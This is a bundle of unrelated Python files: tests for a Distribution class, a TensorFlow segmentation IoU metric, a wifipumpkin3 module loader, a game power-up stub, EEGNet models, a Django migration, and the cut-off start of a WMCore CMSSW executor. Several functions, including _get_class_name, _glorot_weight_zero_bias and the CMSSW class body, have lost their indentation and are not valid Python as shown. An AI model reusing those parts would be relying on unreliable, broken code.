    """str_outcomes=True stringifies tuple outcomes for display."""
    tuple_outcomes = [(0, 0), (0, 1), (1, 0), (1, 1)]
    dist = Distribution(tuple_outcomes, [1/4]*4)
    expected = """Class: Distribution
Alphabet: (0, 1) for all rvs
Base: linear
Outcome Class: tuple
Outcome Length: 2
RV Names: None
x p(x)
00 0.25
01 0.25
10 0.25
11 0.25"""
    assert_equal(dist.to_string(str_outcomes=True), expected)
def test_prepare_string4():
    """When str() fails on an outcome, rendering falls back to repr()."""
    class WeirdInt(int):
        def __str__(self):
            raise Exception

    pairs = [(0, 0), (0, 1), (1, 0), (1, 1)]
    weird_outcomes = [(WeirdInt(a), WeirdInt(b)) for (a, b) in pairs]
    dist = Distribution(weird_outcomes, [1/4]*4)
    expected = """Class: Distribution
Alphabet: (0, 1) for all rvs
Base: linear
Outcome Class: tuple
Outcome Length: 2
RV Names: None
x p(x)
(0, 0) 0.25
(0, 1) 0.25
(1, 0) 0.25
(1, 1) 0.25"""
    assert_equal(dist.to_string(str_outcomes=True), expected)
def test_really_big_words():
    """
    Test to ensure that large but sparse outcomes are fast.
    """
    dist = Distribution(['01'*45, '10'*45], [1/2]*2)
    dist = dist.coalesce([range(30), range(30, 60), range(60, 90)])
    expected_outcomes = (('10'*15,)*3, ('01'*15,)*3)
    assert_equal(dist.outcomes, expected_outcomes)
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Semantic segmentation metric."""
import gin
import gin.tf
import numpy as np
import tensorflow as tf
from tf3d import standard_fields
from object_detection.utils import label_map_util
@gin.configurable
class SemanticSegmentationMetric(tf.keras.metrics.Metric):
  """Semantic segmentation mean intersection over union metric.

  Accumulates per-class true/false positive and false negative counts over
  point-wise predictions and reports per-class precision, recall and IoU as
  well as their means (ignoring classes with no ground truth).
  """

  def __init__(self,
               multi_label=False,
               num_classes=None,
               label_map=None,
               label_map_path=None,
               eval_prefix='eval',
               name='semantic_segmentation_metric'):
    """Semantic segmentation mean intersection over union metric.

    Args:
      multi_label: Boolean which denotes if pixels can be assigned multiple
        labels; classes are treated separately, logit > 0 is positive
        prediction.
      num_classes: Number of classes.
      label_map: A dictionary mapping label ids to label names.
      label_map_path: path to labelmap (could be None).
      eval_prefix: Prefix for eval name; separates scalar values in
        Tensorboard.
      name: class name.

    Raises:
      ValueError: If both num_classes and label_map are None.
    """
    super(SemanticSegmentationMetric, self).__init__(name=name)
    self.multi_label = multi_label
    self.num_classes = num_classes
    # Resolve the label map: an explicit dict wins over a path to load.
    if label_map:
      self.label_map = label_map
    elif label_map_path:
      self.label_map = _get_label_map(label_map_path)
    else:
      self.label_map = None
    self.eval_prefix = eval_prefix
    # The set of class ids to evaluate comes from the label map if present,
    # otherwise from num_classes.
    if self.label_map is not None:
      self.class_range = self.label_map.keys()
    elif num_classes is not None:
      self.class_range = range(num_classes)
    else:
      raise ValueError('Both num_classes and label_map are None.')
    # Per-class confusion counters, accumulated across update_state() calls.
    self.true_positive_metrics = {}
    self.false_positive_metrics = {}
    self.false_negative_metrics = {}
    for c in self.class_range:
      self.true_positive_metrics[c] = tf.keras.metrics.TruePositives(
          name=('%s_true_positive_%d' % (name, c)))
      self.false_positive_metrics[c] = tf.keras.metrics.FalsePositives(
          name=('%s_false_positive_%d' % (name, c)))
      self.false_negative_metrics[c] = tf.keras.metrics.FalseNegatives(
          name=('%s_false_negative_%d' % (name, c)))

  def update_state(self, inputs, outputs):
    """Function that updates the metric state at each example.

    Args:
      inputs: A dictionary containing input tensors.
      outputs: A dictionary containing output tensors.

    Returns:
      Update op.

    Raises:
      ValueError: If num_classes is set but does not match the last logits
        dimension.
    """
    # Prepare logits and labels
    logits = outputs[
        standard_fields.DetectionResultFields.object_semantic_points]
    labels = inputs[standard_fields.InputDataFields.object_class_points]
    weights = inputs[standard_fields.InputDataFields.point_loss_weights]
    num_valid_points = inputs[standard_fields.InputDataFields.num_valid_points]
    # Batched input: drop padded points per example and flatten the batch.
    if len(logits.get_shape().as_list()) == 3:
      batch_size = logits.get_shape().as_list()[0]
      logits_list = []
      labels_list = []
      weights_list = []
      for i in range(batch_size):
        num_valid_points_i = num_valid_points[i]
        logits_list.append(logits[i, 0:num_valid_points_i, :])
        labels_list.append(labels[i, 0:num_valid_points_i, :])
        weights_list.append(weights[i, 0:num_valid_points_i, :])
      logits = tf.concat(logits_list, axis=0)
      labels = tf.concat(labels_list, axis=0)
      weights = tf.concat(weights_list, axis=0)
    if self.num_classes is None:
      num_classes = logits.get_shape().as_list()[-1]
    else:
      num_classes = self.num_classes
      if num_classes != logits.get_shape().as_list()[-1]:
        raise ValueError('num_classes do not match the logits dimensions.')
    # Bug fix: pass the resolved local `num_classes` (which falls back to the
    # logits' last dimension) rather than `self.num_classes`, which can be
    # None when the metric was constructed from a label map only.
    class_labels, class_predictions = _get_class_labels_and_predictions(
        labels=labels,
        logits=logits,
        num_classes=num_classes,
        multi_label=self.multi_label)
    update_ops = []
    for c in self.class_range:
      update_op_tp_c = self.true_positive_metrics[c].update_state(
          y_true=class_labels[c],
          y_pred=class_predictions[c],
          sample_weight=weights)
      update_ops.append(update_op_tp_c)
      update_op_fp_c = self.false_positive_metrics[c].update_state(
          y_true=class_labels[c],
          y_pred=class_predictions[c],
          sample_weight=weights)
      update_ops.append(update_op_fp_c)
      update_op_fn_c = self.false_negative_metrics[c].update_state(
          y_true=class_labels[c],
          y_pred=class_predictions[c],
          sample_weight=weights)
      update_ops.append(update_op_fn_c)
    return tf.group(update_ops)

  def result(self):
    """Returns the scalar mean IoU over all evaluated classes."""
    metrics_dict = self.get_metric_dictionary()
    return metrics_dict[self.eval_prefix + '_avg/mean_iou']

  def get_metric_dictionary(self):
    """Computes per-class precision/recall/IoU and their means.

    Returns:
      A dict mapping metric names (prefixed with eval_prefix) to scalar
      tensors. Classes without ground truth yield NaN and are excluded from
      the means by _non_nan_mean.
    """
    metrics_dict = {}
    class_recall_list = []  # used for calculating mean pixel accuracy.
    class_iou_list = []  # used for calculating mean iou.
    for c in self.class_range:
      tp = self.true_positive_metrics[c].result()
      fp = self.false_positive_metrics[c].result()
      fn = self.false_negative_metrics[c].result()
      # 0/0 produces NaN here, which _non_nan_mean later ignores.
      class_recall = tp / (tp + fn)
      class_precision = tf.where(
          tf.greater(tp + fn, 0.0), _safe_div(tp, (tp + fp)),
          tf.constant(np.nan))
      class_iou = tf.where(
          tf.greater(tp + fn, 0.0), tp / (tp + fn + fp), tf.constant(np.nan))
      class_recall_list.append(class_recall)
      class_iou_list.append(class_iou)
      class_name = _get_class_name(class_id=c, label_map=self.label_map)
      metrics_dict[self.eval_prefix +
                   '_recall/{}'.format(class_name)] = class_recall
      metrics_dict[self.eval_prefix +
                   '_precision/{}'.format(class_name)] = class_precision
      metrics_dict[self.eval_prefix + '_iou/{}'.format(class_name)] = class_iou
    mean_pixel_accuracy = _non_nan_mean(class_recall_list)
    mean_iou = _non_nan_mean(class_iou_list)
    metrics_dict[self.eval_prefix +
                 '_avg/mean_pixel_accuracy'] = mean_pixel_accuracy
    metrics_dict[self.eval_prefix + '_avg/mean_iou'] = mean_iou
    return metrics_dict

  def reset_states(self):
    """Resets all accumulated per-class confusion counters."""
    for metric_dict in (self.true_positive_metrics,
                        self.false_positive_metrics,
                        self.false_negative_metrics):
      for value in metric_dict.values():
        value.reset_states()
def _get_class_labels_and_predictions(labels, logits, num_classes, multi_label):
  """Returns list of per-class-labels and list of per-class-predictions.

  Args:
    labels: A `Tensor` of size [n, k]. In the
      multi-label case, values are either 0 or 1 and k = num_classes. Otherwise,
      k = 1 and values are in [0, num_classes).
    logits: A `Tensor` of size [n, `num_classes`]
      representing the logits of each pixel and semantic class.
    num_classes: Number of classes.
    multi_label: Boolean which defines if we are in a multi_label setting, where
      pixels can have multiple labels, or not.

  Returns:
    class_labels: List of size num_classes; each entry is a float `Tensor`
      with values of 0 or 1 marking ground-truth membership in that class
      (shape [n, 1] in the multi-label split; otherwise mirrors the shape of
      `labels` via `tf.equal`).
    class_predictions: List of size num_classes; each entry is a float
      `Tensor` with values of 0 or 1 marking predicted membership (shape
      [n, 1] when multi_label; otherwise [n], from comparing the argmax over
      logits to the class id).
  """
  class_predictions = [None] * num_classes
  if multi_label:
    # One 0/1 column per class; a positive logit is a positive prediction.
    class_labels = tf.split(labels, num_or_size_splits=num_classes, axis=1)
    class_logits = tf.split(logits, num_or_size_splits=num_classes, axis=1)
    for c in range(num_classes):
      class_predictions[c] = tf.cast(
          tf.greater(class_logits[c], 0), dtype=tf.float32)
  else:
    # Single-label: the predicted class is the argmax over logits.
    class_predictions_flat = tf.argmax(logits, 1)
    class_labels = [None] * num_classes
    for c in range(num_classes):
      class_labels[c] = tf.cast(tf.equal(labels, c), dtype=tf.float32)
      class_predictions[c] = tf.cast(
          tf.equal(class_predictions_flat, c), dtype=tf.float32)
  return class_labels, class_predictions
def _get_class_name(class_id, label_map):
"""Gets class name from label dictionary."""
if label_map and class_id in label_map:
return label_map[class_id]
else:
return str(class_id)
def _non_nan_mean(tensor_list):
  """Calculates the mean of a list of tensors while ignoring nans."""
  stacked = tf.stack(tensor_list)
  finite_mask = tf.logical_not(tf.math.is_nan(stacked))
  return tf.reduce_mean(tf.boolean_mask(stacked, finite_mask))
def _safe_div(a, b):
  """Divides two numbers, returns 0 if denominator is (close to) 0."""
  denominator_near_zero = tf.less(tf.abs(b), 1e-10)
  return tf.where(denominator_near_zero, 0.0, a / b)
def _get_label_map(label_map_path):
  """Returns dictionary mapping label IDs to class-names."""
  if not label_map_path:
    return None
  proto = label_map_util.load_labelmap(label_map_path)
  mapping = {}
  for item in proto.item:
    # Prefer the human-readable display_name; fall back to the raw name.
    if item.HasField('display_name'):
      mapping[item.id] = item.display_name
    elif item.HasField('name'):
      mapping[item.id] = item.name
  return mapping
|
import os
import pkgutil
import sys
import importlib
import re
from wifipumpkin3.core.utility.printer import display_messages
# https://stackoverflow.com/questions/3365740/how-to-import-all-submodules
def import_submodules(package, recursive=True):
    """ Import all submodules of a module, recursively, including subpackages

    :param package: package (name or actual module)
    :type package: str | module
    :rtype: dict[str, types.ModuleType]
    """
    if isinstance(package, str):
        package = importlib.import_module(package)
    # Keys are the module paths with the wifipumpkin3.modules prefix removed.
    prefix_stripper = re.compile(r"(\s*)wifipumpkin3.modules.(\s*)")
    found = {}
    for _loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
        full_name = package.__name__ + "." + name
        short_name = "{}.{}".format(prefix_stripper.sub("", package.__name__), name)
        found[short_name] = importlib.import_module(full_name)
        if recursive and is_pkg:
            found.update(import_submodules(full_name))
    return found
def all_modules():
    """Instantiate every discovered module's ModPump, reporting ones without it."""
    discovered = import_submodules(__name__)
    for mod_name, mod in discovered.items():
        try:
            # Skip package directories; only leaf modules carry a ModPump.
            if not (os.path.isdir(mod_name.replace(".", "/"))):
                mod.ModPump()
        except AttributeError:
            print(
                display_messages(
                    "Module {} not has `ModPump` class!".format(mod_name), error=True
                )
            )
def module_list():
    """Return the dict of all discovered wifipumpkin3 submodules."""
    return import_submodules(__name__)
|
'''
Created on 28 de abr de 2020
@author: leonardo
Content: Classe do PowerUp de Velocidade
'''
from componentes.jogo.powerups import PowerUp
class Velocidade(PowerUp):
    """Speed power-up; applying it is currently a no-op placeholder."""

    def poder(self, personagem):
        """Apply the speed effect to the given character (not yet enabled)."""
        pass
        # Intended effect, currently disabled:
        #personagem.velocidade += 1
        #personagem.servidor.emitPoder("velocidade", personagem.velocidade-1, personagem.sid)
|
# Authors: Robin Schirrmeister <robintibor@gmail.com>
#
# License: BSD (3-clause)
import torch
from torch import nn
from torch.nn.functional import elu
from .modules import Expression, Ensure4d
from .functions import squeeze_final_output
class Conv2dWithConstraint(nn.Conv2d):
    """Conv2d that re-normalises its filter weights to a maximum L2 norm
    (per output filter) before every forward pass."""

    def __init__(self, *args, max_norm=1, **kwargs):
        # Store the constraint before nn.Conv2d initialises the weights.
        self.max_norm = max_norm
        super(Conv2dWithConstraint, self).__init__(*args, **kwargs)

    def forward(self, x):
        constrained_weight = torch.renorm(
            self.weight.data, p=2, dim=0, maxnorm=self.max_norm
        )
        self.weight.data = constrained_weight
        return super(Conv2dWithConstraint, self).forward(x)
class EEGNetv4(nn.Sequential):
    """EEGNet v4 model from Lawhern et al 2018.

    See details in [EEGNet4]_.

    Parameters
    ----------
    in_chans : int
        Number of input (EEG) channels.
    n_classes : int
        Number of output classes.
    input_window_samples : int, optional
        Time samples per input window; required when
        ``final_conv_length == "auto"`` and also used for the dummy forward
        pass that sizes the classifier.
    final_conv_length : int or "auto"
        Temporal kernel length of the classifier conv; "auto" infers it.
    pool_mode : {"mean", "max"}
        Pooling operator used after each block.
    F1 : int
        Number of temporal filters.
    D : int
        Depth multiplier of the depthwise spatial convolution.
    F2 : int
        Number of pointwise filters (usually F1 * D).
    kernel_length : int
        Length of the temporal convolution kernel.
    third_kernel_size : tuple
        Stored on the instance but never used by this implementation.
    drop_prob : float
        Dropout probability.

    Notes
    -----
    This implementation is not guaranteed to be correct, has not been checked
    by original authors, only reimplemented from the paper description.

    References
    ----------
    .. [EEGNet4] Lawhern, V. J., Solon, A. J., Waytowich, N. R., Gordon,
       S. M., Hung, C. P., & Lance, B. J. (2018).
       EEGNet: A Compact Convolutional Network for EEG-based
       Brain-Computer Interfaces.
       arXiv preprint arXiv:1611.08024.
    """

    def __init__(
        self,
        in_chans,
        n_classes,
        input_window_samples=None,
        final_conv_length="auto",
        pool_mode="mean",
        F1=8,
        D=2,
        F2=16,  # usually set to F1*D (?)
        kernel_length=64,
        third_kernel_size=(8, 4),
        drop_prob=0.25,
    ):
        super().__init__()
        if final_conv_length == "auto":
            assert input_window_samples is not None
        self.in_chans = in_chans
        self.n_classes = n_classes
        self.input_window_samples = input_window_samples
        self.final_conv_length = final_conv_length
        self.pool_mode = pool_mode
        self.F1 = F1
        self.D = D
        self.F2 = F2
        self.kernel_length = kernel_length
        self.third_kernel_size = third_kernel_size
        self.drop_prob = drop_prob
        pool_class = dict(max=nn.MaxPool2d, mean=nn.AvgPool2d)[self.pool_mode]
        self.add_module("ensuredims", Ensure4d())
        # b c 0 1
        # now to b 1 0 c
        self.add_module("dimshuffle", Expression(_transpose_to_b_1_c_0))
        # Temporal convolution over the time axis.
        self.add_module(
            "conv_temporal",
            nn.Conv2d(
                1,
                self.F1,
                (1, self.kernel_length),
                stride=1,
                bias=False,
                padding=(0, self.kernel_length // 2),
            ),
        )
        self.add_module(
            "bnorm_temporal",
            nn.BatchNorm2d(self.F1, momentum=0.01, affine=True, eps=1e-3),
        )
        # Depthwise spatial convolution across EEG channels, max-norm 1.
        self.add_module(
            "conv_spatial",
            Conv2dWithConstraint(
                self.F1,
                self.F1 * self.D,
                (self.in_chans, 1),
                max_norm=1,
                stride=1,
                bias=False,
                groups=self.F1,
                padding=(0, 0),
            ),
        )
        self.add_module(
            "bnorm_1",
            nn.BatchNorm2d(
                self.F1 * self.D, momentum=0.01, affine=True, eps=1e-3
            ),
        )
        self.add_module("elu_1", Expression(elu))
        self.add_module("pool_1", pool_class(kernel_size=(1, 4), stride=(1, 4)))
        self.add_module("drop_1", nn.Dropout(p=self.drop_prob))
        # Separable convolution = depthwise + pointwise:
        # https://discuss.pytorch.org/t/how-to-modify-a-conv2d-to-depthwise-separable-convolution/15843/7
        self.add_module(
            "conv_separable_depth",
            nn.Conv2d(
                self.F1 * self.D,
                self.F1 * self.D,
                (1, 16),
                stride=1,
                bias=False,
                groups=self.F1 * self.D,
                padding=(0, 16 // 2),
            ),
        )
        self.add_module(
            "conv_separable_point",
            nn.Conv2d(
                self.F1 * self.D,
                self.F2,
                (1, 1),
                stride=1,
                bias=False,
                padding=(0, 0),
            ),
        )
        self.add_module(
            "bnorm_2",
            nn.BatchNorm2d(self.F2, momentum=0.01, affine=True, eps=1e-3),
        )
        self.add_module("elu_2", Expression(elu))
        self.add_module("pool_2", pool_class(kernel_size=(1, 8), stride=(1, 8)))
        self.add_module("drop_2", nn.Dropout(p=self.drop_prob))
        # Dummy forward pass to discover the feature-map size reaching the
        # classifier. NOTE(review): this runs even when final_conv_length is
        # given explicitly, so input_window_samples must not be None -- confirm.
        out = self(
            torch.ones(
                (1, self.in_chans, self.input_window_samples, 1),
                dtype=torch.float32
            )
        )
        n_out_virtual_chans = out.cpu().data.numpy().shape[2]
        if self.final_conv_length == "auto":
            n_out_time = out.cpu().data.numpy().shape[3]
            self.final_conv_length = n_out_time
        self.add_module(
            "conv_classifier",
            nn.Conv2d(
                self.F2,
                self.n_classes,
                (n_out_virtual_chans, self.final_conv_length),
                bias=True,
            ),
        )
        self.add_module("softmax", nn.LogSoftmax(dim=1))
        # Transpose back to the the logic of braindecode,
        # so time in third dimension (axis=2)
        self.add_module("permute_back", Expression(_transpose_1_0))
        self.add_module("squeeze", Expression(squeeze_final_output))
        _glorot_weight_zero_bias(self)
def _transpose_to_b_1_c_0(x):
    """Permute axes (0, 1, 2, 3) -> (0, 3, 1, 2), i.e. b c 0 1 -> b 1 c 0."""
    return x.permute(0, 3, 1, 2)
def _transpose_1_0(x):
    """Swap the last two axes: (0, 1, 2, 3) -> (0, 1, 3, 2)."""
    return x.permute(0, 1, 3, 2)
class EEGNetv1(nn.Sequential):
    """EEGNet model from Lawhern et al. 2016.

    See details in [EEGNet]_.

    Parameters
    ----------
    in_chans : int
        Number of input (EEG) channels.
    n_classes : int
        Number of output classes.
    input_window_samples : int, optional
        Time samples per input window; required when
        ``final_conv_length == "auto"`` and also used for the dummy forward
        pass that sizes the classifier.
    final_conv_length : int or "auto"
        Temporal kernel length of the classifier conv; "auto" infers it.
    pool_mode : {"max", "mean"}
        Pooling operator used after the second and third blocks.
    second_kernel_size : tuple
        Kernel size of the second convolution.
    third_kernel_size : tuple
        Kernel size of the third convolution.
    drop_prob : float
        Dropout probability.

    Notes
    -----
    This implementation is not guaranteed to be correct, has not been checked
    by original authors, only reimplemented from the paper description.

    References
    ----------
    .. [EEGNet] Lawhern, V. J., Solon, A. J., Waytowich, N. R., Gordon,
       S. M., Hung, C. P., & Lance, B. J. (2016).
       EEGNet: A Compact Convolutional Network for EEG-based
       Brain-Computer Interfaces.
       arXiv preprint arXiv:1611.08024.
    """

    def __init__(
        self,
        in_chans,
        n_classes,
        input_window_samples=None,
        final_conv_length="auto",
        pool_mode="max",
        second_kernel_size=(2, 32),
        third_kernel_size=(8, 4),
        drop_prob=0.25,
    ):
        super().__init__()
        if final_conv_length == "auto":
            assert input_window_samples is not None
        self.in_chans = in_chans
        self.n_classes = n_classes
        self.input_window_samples = input_window_samples
        self.final_conv_length = final_conv_length
        self.pool_mode = pool_mode
        self.second_kernel_size = second_kernel_size
        self.third_kernel_size = third_kernel_size
        self.drop_prob = drop_prob
        pool_class = dict(max=nn.MaxPool2d, mean=nn.AvgPool2d)[self.pool_mode]
        self.add_module("ensuredims", Ensure4d())
        n_filters_1 = 16
        # 1x1 convolution mixing the EEG channels into virtual channels.
        self.add_module(
            "conv_1",
            nn.Conv2d(self.in_chans, n_filters_1, (1, 1), stride=1, bias=True),
        )
        self.add_module(
            "bnorm_1",
            nn.BatchNorm2d(n_filters_1, momentum=0.01, affine=True, eps=1e-3),
        )
        self.add_module("elu_1", Expression(elu))
        # transpose to examples x 1 x (virtual, not EEG) channels x time
        self.add_module(
            "permute_1", Expression(lambda x: x.permute(0, 3, 1, 2))
        )
        self.add_module("drop_1", nn.Dropout(p=self.drop_prob))
        n_filters_2 = 4
        # keras padds unequal padding more in front, so padding
        # too large should be ok.
        # Not padding in time so that cropped training makes sense
        # https://stackoverflow.com/questions/43994604/padding-with-even-kernel-size-in-a-convolutional-layer-in-keras-theano
        self.add_module(
            "conv_2",
            nn.Conv2d(
                1,
                n_filters_2,
                self.second_kernel_size,
                stride=1,
                padding=(self.second_kernel_size[0] // 2, 0),
                bias=True,
            ),
        )
        self.add_module(
            "bnorm_2",
            nn.BatchNorm2d(n_filters_2, momentum=0.01, affine=True, eps=1e-3),
        )
        self.add_module("elu_2", Expression(elu))
        self.add_module("pool_2", pool_class(kernel_size=(2, 4), stride=(2, 4)))
        self.add_module("drop_2", nn.Dropout(p=self.drop_prob))
        n_filters_3 = 4
        self.add_module(
            "conv_3",
            nn.Conv2d(
                n_filters_2,
                n_filters_3,
                self.third_kernel_size,
                stride=1,
                padding=(self.third_kernel_size[0] // 2, 0),
                bias=True,
            ),
        )
        self.add_module(
            "bnorm_3",
            nn.BatchNorm2d(n_filters_3, momentum=0.01, affine=True, eps=1e-3),
        )
        self.add_module("elu_3", Expression(elu))
        self.add_module("pool_3", pool_class(kernel_size=(2, 4), stride=(2, 4)))
        self.add_module("drop_3", nn.Dropout(p=self.drop_prob))
        # Dummy forward pass to discover the feature-map size reaching the
        # classifier. NOTE(review): runs even when final_conv_length is given
        # explicitly, so input_window_samples must not be None -- confirm.
        out = self(
            torch.ones(
                (1, self.in_chans, self.input_window_samples, 1),
                dtype=torch.float32,
            )
        )
        n_out_virtual_chans = out.cpu().data.numpy().shape[2]
        if self.final_conv_length == "auto":
            n_out_time = out.cpu().data.numpy().shape[3]
            self.final_conv_length = n_out_time
        self.add_module(
            "conv_classifier",
            nn.Conv2d(
                n_filters_3,
                self.n_classes,
                (n_out_virtual_chans, self.final_conv_length),
                bias=True,
            ),
        )
        self.add_module("softmax", nn.LogSoftmax(dim=1))
        # Transpose back to the the logic of braindecode,
        # so time in third dimension (axis=2)
        self.add_module(
            "permute_2", Expression(lambda x: x.permute(0, 1, 3, 2))
        )
        self.add_module("squeeze", Expression(squeeze_final_output))
        _glorot_weight_zero_bias(self)
def _glorot_weight_zero_bias(model):
"""Initalize parameters of all modules by initializing weights with
glorot
uniform/xavier initialization, and setting biases to zero. Weights from
batch norm layers are set to 1.
Parameters
----------
model: Module
"""
for module in model.modules():
if hasattr(module, "weight"):
if not ("BatchNorm" in module.__class__.__name__):
nn.init.xavier_uniform_(module.weight, gain=1)
else:
nn.init.constant_(module.weight, 1)
if hasattr(module, "bias"):
if module.bias is not None:
nn.init.constant_(module.bias, 0)
|
from vit.formatter.wait import Wait

class WaitAge(Wait):
    """Formatter that renders a task's `wait` timestamp as a relative age."""

    def format(self, wait, task):
        # `task` is part of the formatter interface but unused here.
        return self.age(wait)
|
# Generated by Django 2.2.8 on 2020-01-16 09:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter `apartmentsensorvalue.value` to
    DecimalField(max_digits=8, decimal_places=1)."""

    dependencies = [
        ('core', '0023_auto_20200108_1446'),
    ]

    operations = [
        migrations.AlterField(
            model_name='apartmentsensorvalue',
            name='value',
            field=models.DecimalField(decimal_places=1, max_digits=8),
        ),
    ]
|
#!/usr/bin/env python
"""
_Step.Executor.CMSSW_
Implementation of an Executor for a CMSSW step.
"""
import logging
import os
import socket
import subprocess
import sys
from Utils.PythonVersion import PY3
from Utils.Utilities import encodeUnicodeToBytesConditional
from WMCore.FwkJobReport.Report import addAttributesToFile
from WMCore.WMExceptions import WM_JOB_ERROR_CODES
from WMCore.WMRuntime.Tools.Scram import Scram
from WMCore.WMRuntime.Tools.Scram import getSingleScramArch
from WMCore.WMSpec.Steps.Executor import Executor
from WMCore.WMSpec.Steps.WMExecutionFailure import WMExecutionFailure
from WMCore.WMSpec.WMStep import WMStepHelper
def analysisFileLFN(fileName, lfnBase, job):
    """
    Construct an LFN for a user file

    The file's base name is suffixed with the job counter (zero-padded to
    four digits) and placed under <lfnBase>/<workflow>/output/.
    """
    baseName = os.path.basename(fileName)
    stem, extension = os.path.splitext(baseName)
    numberedName = '{base}_{count:04d}{ext}'.format(base=stem, ext=extension, count=job['counter'])
    return os.path.join(lfnBase, job['workflow'], 'output', numberedName)
class CMSSW(Executor):
"""
_CMSWW_
Execute a CMSSW Step
"""
def __init__(self):
super(CMSSW, self).__init__()
self.failedPreviousStep = None
def _setStatus(self, returnCode, returnMessage):
"""
Set return code.
"""
self.setCondorChirpAttrDelayed('Chirp_WMCore_cmsRun_ExitCode', returnCode)
self.setCondorChirpAttrDelayed('Chirp_WMCore_%s_ExitCode' % self.stepName, returnCode)
if returnMessage and returnCode != 0:
self.setCondorChirpAttrDelayed('Chirp_WMCore_cmsRun_Exception_Message', returnMessage, compress=True)
self.setCondorChirpAttrDelayed('Chirp_WMCore_%s_Exception_Message' % self.stepName, returnMessage, compress=True)
self.step.execution.exitStatus = returnCode
def pre(self, emulator=None):
"""
_pre_
Pre execution checks
"""
if emulator is not None:
return emulator.emulatePre(self.step)
logging.info("Steps.Executors.%s.pre called", self.__class__.__name__)
if hasattr(self.step.application.configuration, 'configCacheUrl'):
# means we have a configuration & tweak in the sandbox
psetFile = self.step.application.command.configuration
psetTweak = self.step.application.command.psetTweak
self.stepSpace.getFromSandbox(psetFile)
if psetTweak:
self.stepSpace.getFromSandbox(psetTweak)
if hasattr(self.step, "pileup"):
self.stepSpace.getFromSandbox("pileupconf.json")
# add in ths scram env PSet manip script whatever happens
self.step.runtime.preScripts.append("SetupCMSSWPset")
return None
def execute(self, emulator=None):
"""
_execute_
"""
if emulator is not None:
return emulator.emulate(self.step, self.job)
logging.info("Steps.Executors.%s.execute called", self.__class__.__name__)
stepModule = "WMTaskSpace.%s" % self.stepName
overrides = {}
if hasattr(self.step, 'override'):
overrides = self.step.override.dictionary_()
self.failedPreviousStep = overrides.get('previousCmsRunFailure', False)
if self.failedPreviousStep:
# the previous cmsRun step within this task failed
# don't bother executing anything else then
msg = WM_JOB_ERROR_CODES[99108]
logging.critical(msg)
self._setStatus(99108, msg)
raise WMExecutionFailure(99108, "CmsRunFailure", msg)
# write the wrapper script to a temporary location
# I don't pass it directly through os.system because I don't
# trust that there won't be shell-escape shenanigans with
# arbitrary input files
scramSetup = self.step.application.setup.softwareEnvironment
scramCommand = self.step.application.setup.scramCommand
scramProject = self.step.application.setup.scramProject
scramArch = self.step.application.setup.scramArch
cmsswVersion = self.step.application.setup.cmsswVersion
jobReportXML = self.step.output.jobReport
cmsswCommand = self.step.application.command.executable
cmsswConfig = self.step.application.command.configuration
cmsswArguments = self.step.application.command.arguments
userTarball = ','.join(self.step.user.inputSandboxes)
userFiles = ','.join(self.step.user.userFiles)
logging.info('User files are %s', userFiles)
logging.info('User sandboxes are %s', userTarball)
scramArch = getSingleScramArch(scramArch)
multicoreSettings = self.step.application.multicore
try:
logging.info("CMSSW configured for %s cores and %s event streams",
multicoreSettings.numberOfCores, multicoreSettings.eventStreams)
except AttributeError:
logging.info("No value set for multicore numberOfCores or eventStreams")
logging.info("Executing CMSSW step")
#
# set any global environment variables
#
try:
os.environ['FRONTIER_ID'] = 'wmagent_%s' % (self.report.data.workload)
except Exception as ex:
logging.error('Have critical error in setting FRONTIER_ID: %s', str(ex))
logging.error('Continuing, as this is not a critical function yet.')
#
# scram bootstrap
#
scram = Scram(
command=scramCommand,
version=cmsswVersion,
initialise=self.step.application.setup.softwareEnvironment,
directory=self.step.builder.workingDir,
architecture=scramArch,
)
logging.info("Runing SCRAM")
try:
projectOutcome = scram.project()
except Exception as ex:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(ex)
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
if projectOutcome > 0:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(scram.diagnostic())
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
runtimeOutcome = scram.runtime()
if runtimeOutcome > 0:
msg = WM_JOB_ERROR_CODES[50513]
msg += "\nDetails: %s" % str(scram.diagnostic())
logging.critical(msg)
raise WMExecutionFailure(50513, "ScramSetupFailure", msg)
#
# pre scripts
#
logging.info("Running PRE scripts")
for script in self.step.runtime.preScripts:
# TODO: Exception handling and error handling & logging
scriptProcess = subprocess.Popen(
["/bin/bash"], shell=True, cwd=self.step.builder.workingDir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
# BADPYTHON
invokeCommand = "export LD_LIBRARY_PATH=$LD_LIBRARY_PATH\n"
invokeCommand += "{} -m WMCore.WMRuntime.ScriptInvoke {} {} \n".format(sys.executable,
stepModule,
script)
logging.info(" Invoking command:\n%s", invokeCommand)
scriptProcess.stdin.write(encodeUnicodeToBytesConditional(invokeCommand, condition=PY3))
stdout, stderr = scriptProcess.communicate()
retCode = scriptProcess.returncode
if retCode > 0:
msg = "Error running command\n%s\n" % invokeCommand
msg += "%s\n %s\n %s\n" % (retCode, stdout, stderr)
logging.critical("Error running command")
logging.critical(msg)
raise WMExecutionFailure(50513, "PreScriptFailure", msg)
#
# pre scripts with scram
#
logging.info("RUNNING SCRAM SCRIPTS")
for script in self.step.runtime.scramPreScripts:
# invoke scripts with scram()
runtimeDir = getattr(self.step.runtime, 'scramPreDir', None)
invokeCommand = self.step.runtime.invokeCommand if hasattr(self.step.runtime, 'invokeCommand') else \
"%s -m WMCore.WMRuntime.ScriptInvoke %s" % (sys.executable, stepModule)
invokeCommand += " %s \n" % script
retCode = scram(invokeCommand, runtimeDir=runtimeDir)
if retCode > 0:
msg = "Error running command\n%s\n" % invokeCommand
msg += "%s\n " % retCode
msg += scram.diagnostic()
logging.critical(msg)
raise WMExecutionFailure(50513, "PreScriptScramFailure", msg)
configPath = "%s/%s-main.sh" % (self.step.builder.workingDir, self.stepName)
